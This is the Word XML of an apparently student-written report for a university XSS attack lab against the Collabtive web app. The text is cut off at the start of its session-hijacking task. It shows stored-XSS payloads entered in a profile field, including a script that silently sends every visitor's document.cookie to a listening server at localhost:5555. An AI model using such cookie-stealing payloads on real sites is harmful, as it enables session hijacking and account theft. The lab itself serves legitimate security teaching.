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D323" w14:textId="77777777" w:rsidR="000B0062" w:rsidRPr="007F747A" w:rsidRDefault="000B0062" w:rsidP="000B0062">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:pBdr>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F747A">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CIS 643 Computer Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6FE2B2" w14:textId="7ED266BB" w:rsidR="000B0062" w:rsidRDefault="00F41FD3" w:rsidP="000B0062">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="00DE05CA">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="000B0062" w:rsidRPr="007F747A">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093377D" w:rsidRPr="0093377D">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E589F9B" w14:textId="77777777" w:rsidR="000B0062" w:rsidRDefault="000B0062" w:rsidP="000B0062">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EFC816" w14:textId="77777777" w:rsidR="000B0062" w:rsidRPr="00B23F72" w:rsidRDefault="000B0062" w:rsidP="000B0062">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B23F72">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Instructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F72">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wenliang (Kevin) Du</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBD879" w14:textId="77777777" w:rsidR="000B0062" w:rsidRDefault="000B0062" w:rsidP="000B0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p w14:paraId="7FED0508" w14:textId="5E792D4D" w:rsidR="00D32C64" w:rsidRDefault="00D32C64"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-3699959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20474CAE" w14:textId="4BC6459A" w:rsidR="008C380C" w:rsidRDefault="008C380C">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="73ECE431" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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Task 1: Posting a Malicious Message to Display an Alert Wind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1FB294E" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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mbed a Java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B6C78C3" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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 to a JavaScript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61D278" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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2: Posting a Malicious Message to Display Cook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D4025C" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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3: Stealing Cookies from the Victim’s Mach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6B692C" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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4: Session Hijacking using the Stolen Cook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AEB072" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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5: Writing an XSS W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B40217" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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6: Writing a Self-Propagating XSS W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C13627" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380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7: Countermeas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3098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A557245" w14:textId="54472B24" w:rsidR="008C380C" w:rsidRDefault="008C380C">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5A0C63AF" w14:textId="7F2A258D" w:rsidR="000B0062" w:rsidRDefault="000B0062">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAEB744" w14:textId="77C41F84" w:rsidR="00437035" w:rsidRDefault="00437035" w:rsidP="00437035">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc183098914"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1: Posting a Malicious Message to Display an Alert Window</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="76F739F1" w14:textId="77777777" w:rsidR="00EE4857" w:rsidRDefault="002639F4" w:rsidP="00EE4857">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc183098915"/>
      <w:r>
        <w:t>Embed a JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F9F820" w14:textId="6F059E3A" w:rsidR="00437035" w:rsidRPr="006336A2" w:rsidRDefault="00464479" w:rsidP="006336A2">
      <w:r w:rsidRPr="006336A2">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="002404D5" w:rsidRPr="006336A2">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="002639F4" w:rsidRPr="006336A2">
        <w:t>erter’s Collabtive profile</w:t>
      </w:r>
      <w:r w:rsidR="007E0199" w:rsidRPr="006336A2">
        <w:t xml:space="preserve"> edit page</w:t>
      </w:r>
      <w:r w:rsidRPr="006336A2">
        <w:t>, enter “&lt;script&gt;alert(’XSS’);&lt;/script&gt;” as the value for company field</w:t>
      </w:r>
      <w:r w:rsidR="00D61F5D" w:rsidRPr="006336A2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0B020" w14:textId="19CD3158" w:rsidR="00437035" w:rsidRDefault="002404D5" w:rsidP="00437035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7584F86E" wp14:editId="7AB20094">
            <wp:extent cx="5266055" cy="2328545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="2" name="Picture 2" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.25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er:Desktop:screenshot:Screen Shot 2011-11-16 at 11.25.2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4669" w14:textId="77777777" w:rsidR="004D42CA" w:rsidRDefault="00D61F5D" w:rsidP="00437035">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the website do not encode the </w:t>
      </w:r>
      <w:r w:rsidR="00BD05CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="0072440C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BD05CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="0047159C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0047159C" w:rsidRPr="006336A2">
        <w:t>“&lt;script&gt;alert(’XSS’);&lt;/script&gt;”</w:t>
      </w:r>
      <w:r w:rsidR="0047159C">
        <w:t xml:space="preserve"> will be displayed on web</w:t>
      </w:r>
      <w:r w:rsidR="0047159C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> as origin, and browser will analyze it as html codes.</w:t>
      </w:r>
      <w:r w:rsidR="0047159C" w:rsidRPr="006336A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEAAEF1" w14:textId="29032CA1" w:rsidR="002404D5" w:rsidRPr="006336A2" w:rsidRDefault="004D42CA" w:rsidP="00437035">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="00D61F5D" w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF4513">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="002404D5" w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>hen</w:t>
      </w:r>
      <w:r w:rsidR="00F72336" w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve"> any user include Peter self visit the profile, the “XSS” will popup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44265229" w14:textId="686D912D" w:rsidR="008A50E6" w:rsidRDefault="004A0468" w:rsidP="00437035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B82F212" wp14:editId="41CA8FA5">
            <wp:extent cx="3586370" cy="1464733"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="3" name="Picture 3" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.25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er:Desktop:screenshot:Screen Shot 2011-11-16 at 11.25.4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73" cy="14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7293" w14:textId="18927B98" w:rsidR="00936143" w:rsidRDefault="00936143" w:rsidP="00936143">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc183098916"/>
      <w:r>
        <w:t xml:space="preserve">Reference to a JavaScript </w:t>
      </w:r>
      <w:r w:rsidR="00BF4D98">
        <w:t>file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2661A6ED" w14:textId="7493879B" w:rsidR="00437035" w:rsidRDefault="00436492" w:rsidP="00437035">
      <w:r>
        <w:t>Instead of embed JavaScript directly, this time we link to a JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="008056CB">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC5E71" w14:textId="4BE3AB5D" w:rsidR="003D313D" w:rsidRDefault="003D313D" w:rsidP="00437035">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To make the </w:t>
      </w:r>
      <w:r w:rsidR="002676E9">
        <w:t>task easy, I just put the JavaScript file under the same server as the system</w:t>
      </w:r>
      <w:r w:rsidR="001965F7">
        <w:t xml:space="preserve">. But in </w:t>
      </w:r>
      <w:r w:rsidR="001965F7" w:rsidRPr="001965F7">
        <w:t>practice</w:t>
      </w:r>
      <w:r w:rsidR="001965F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, the attacker will have other</w:t>
      </w:r>
      <w:r w:rsidR="00477952">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> server for XSS to find the </w:t>
      </w:r>
      <w:r w:rsidR="00FC45D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>js fi</w:t>
      </w:r>
      <w:r w:rsidR="00C0088B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>le.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6566CE3C" w14:textId="39F8AC02" w:rsidR="003D4119" w:rsidRDefault="003D4119" w:rsidP="00437035">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>In the js file, the statement is just like before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9AD78" w14:textId="4575E930" w:rsidR="00400E79" w:rsidRDefault="0083133F" w:rsidP="00437035">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090B597D" wp14:editId="50BEEAAA">
            <wp:extent cx="3429000" cy="2425894"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="6" name="Picture 6" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.26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der:Desktop:screenshot:Screen Shot 2011-11-16 at 11.26.5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16" cy="242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668D" w14:textId="71E38B50" w:rsidR="003E3C86" w:rsidRDefault="003E3C86" w:rsidP="00437035">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">But we have to change the value for </w:t>
      </w:r>
      <w:r w:rsidR="00BD563B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>company field</w:t>
      </w:r>
      <w:r w:rsidR="00866E2F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1D3B4" w14:textId="428F348B" w:rsidR="00866E2F" w:rsidRDefault="00BA51E4" w:rsidP="00437035">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EBDB9F6" wp14:editId="04CB74DC">
            <wp:extent cx="5266055" cy="2303145"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="5" name="Picture 5" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.2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der:Desktop:screenshot:Screen Shot 2011-11-16 at 11.27.5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49DD" w14:textId="0BD00253" w:rsidR="00CA00AE" w:rsidRDefault="00DE40A4" w:rsidP="00CA00AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>After done this, we wou</w:t>
      </w:r>
      <w:r w:rsidR="00CA00AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ld get the same result as before: </w:t>
      </w:r>
      <w:r w:rsidR="00CA00AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00CA00AE" w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>hen user</w:t>
      </w:r>
      <w:r w:rsidR="00CA00AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CA00AE" w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve"> visit the profile, the </w:t>
      </w:r>
      <w:r w:rsidR="00F77B31">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>messa</w:t>
      </w:r>
      <w:r w:rsidR="00693790">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>ge would</w:t>
      </w:r>
      <w:r w:rsidR="00CA00AE" w:rsidRPr="006336A2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve"> popup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCCF782" w14:textId="3DAFEB7B" w:rsidR="009D278A" w:rsidRPr="006B3179" w:rsidRDefault="00150713" w:rsidP="00437035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1A05197" wp14:editId="3BBB880B">
            <wp:extent cx="4229100" cy="1505212"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.28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der:Desktop:screenshot:Screen Shot 2011-11-16 at 11.28.32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77C1" w14:textId="77777777" w:rsidR="00437035" w:rsidRDefault="00437035" w:rsidP="00437035">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc183098917"/>
      <w:r>
        <w:t>Task 2: Posting a Malicious Message to Display Cookies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0B4D89C6" w14:textId="217A4BD2" w:rsidR="00437035" w:rsidRDefault="001A3F9F" w:rsidP="00437035">
      <w:r>
        <w:t>Instead just popup the simple message, this time, we popup the</w:t>
      </w:r>
      <w:r w:rsidR="00103C69">
        <w:t xml:space="preserve"> cookie</w:t>
      </w:r>
      <w:r w:rsidR="009F1A39">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5066AB" w14:textId="50FABA0A" w:rsidR="00275294" w:rsidRDefault="00985292" w:rsidP="00167A33">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4526E033" wp14:editId="2792B96A">
            <wp:extent cx="4983249" cy="2163233"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.29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der:Desktop:screenshot:Screen Shot 2011-11-16 at 11.29.47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69" cy="21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DF69" w14:textId="25C9F619" w:rsidR="00985292" w:rsidRDefault="009F1A39" w:rsidP="00437035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB37E31" wp14:editId="532B1A28">
            <wp:extent cx="4457700" cy="1741584"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="10" name="Picture 10" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.30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er:Desktop:screenshot:Screen Shot 2011-11-16 at 11.30.02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4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7EA2" w14:textId="479AF4D0" w:rsidR="00FB2BC7" w:rsidRDefault="00437035" w:rsidP="00437035">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc183098918"/>
      <w:r>
        <w:t>Task 3: Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="53E63AD3" w14:textId="3D202DDF" w:rsidR="00437035" w:rsidRDefault="006F4206" w:rsidP="00437035">
      <w:r>
        <w:t>Make a small server</w:t>
      </w:r>
      <w:r w:rsidR="00AC271D">
        <w:t>, and run it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at background</w:t>
      </w:r>
      <w:r w:rsidR="00FF5BE7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091BFEAE" w14:textId="7CC91154" w:rsidR="00FF5BE7" w:rsidRDefault="00441B3F" w:rsidP="00437035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B4AAFBD" wp14:editId="44F4C226">
            <wp:extent cx="5266055" cy="2506345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="11" name="Picture 11" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.31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der:Desktop:screenshot:Screen Shot 2011-11-16 at 11.31.46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9D60" w14:textId="4D574C02" w:rsidR="00437035" w:rsidRDefault="00A928AA" w:rsidP="00437035">
      <w:r>
        <w:t>Test the server connection</w:t>
      </w:r>
      <w:r w:rsidR="006D6D0E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51B9F3" w14:textId="258B39C7" w:rsidR="006D6D0E" w:rsidRDefault="00C762FE" w:rsidP="00437035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31905F31" wp14:editId="348D8090">
            <wp:extent cx="4015175" cy="1155700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 12" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.32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der:Desktop:screenshot:Screen Shot 2011-11-16 at 11.32.10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46" cy="11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262B" w14:textId="5B3FB053" w:rsidR="001524C0" w:rsidRDefault="001524C0" w:rsidP="00437035">
      <w:r>
        <w:t>Go to edit the profile, put value for company as following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0913E4DD" w14:textId="07523477" w:rsidR="001524C0" w:rsidRDefault="001524C0" w:rsidP="00437035">
      <w:r w:rsidRPr="00E622E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write('&lt;img src=http://</w:t>
      </w:r>
      <w:r w:rsidR="001A2AAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00E622E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>:5555?c='+ escape(document.cookie) + ' &gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093F35FE" w14:textId="35F70582" w:rsidR="00585FA5" w:rsidRDefault="00071314" w:rsidP="00437035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A03B4BE" wp14:editId="3BEAB38D">
            <wp:extent cx="5266055" cy="2353945"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="13" name="Picture 13" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.33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der:Desktop:screenshot:Screen Shot 2011-11-16 at 11.33.23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762C" w14:textId="1C754E13" w:rsidR="001524C0" w:rsidRDefault="00E16882" w:rsidP="00437035">
      <w:r>
        <w:t>Every time</w:t>
      </w:r>
      <w:r w:rsidR="00327B3B">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004961E5">
        <w:t xml:space="preserve">users view the </w:t>
      </w:r>
      <w:r w:rsidR="00473722">
        <w:t>profil</w:t>
      </w:r>
      <w:r w:rsidR="00D34B8C">
        <w:t>e, their cookie information will be sent to the server automatically and secretly</w:t>
      </w:r>
      <w:r w:rsidR="00C31B15">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB5CB6" w14:textId="6433B45F" w:rsidR="001524C0" w:rsidRDefault="00327B3B" w:rsidP="00437035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A61E487" wp14:editId="47174EB8">
            <wp:extent cx="5266055" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="Macintosh HD:Users:Ider:Desktop:Screen Shot 2011-11-16 at 8.3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der:Desktop:Screen Shot 2011-11-16 at 8.30.1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34DB" w14:textId="3B340E41" w:rsidR="00437035" w:rsidRDefault="00ED38ED" w:rsidP="00ED38ED">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc183098919"/>
      <w:r>
        <w:t>Task 4: Session Hijacking using the Stolen Cookies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6BF5CD90" w14:textId="6660A002" w:rsidR="00F54070" w:rsidRDefault="000A319F" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">In this task, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>we will use the stolen cookies to attack the system: create a fake project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C7BA7" w14:textId="103EE895" w:rsidR="00D56F7F" w:rsidRDefault="00861B85" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Except the session information, we also need to know the project files</w:t>
      </w:r>
      <w:r w:rsidR="00F20488">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B31CAD4" w14:textId="4561409D" w:rsidR="00F20488" w:rsidRDefault="00F20488" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
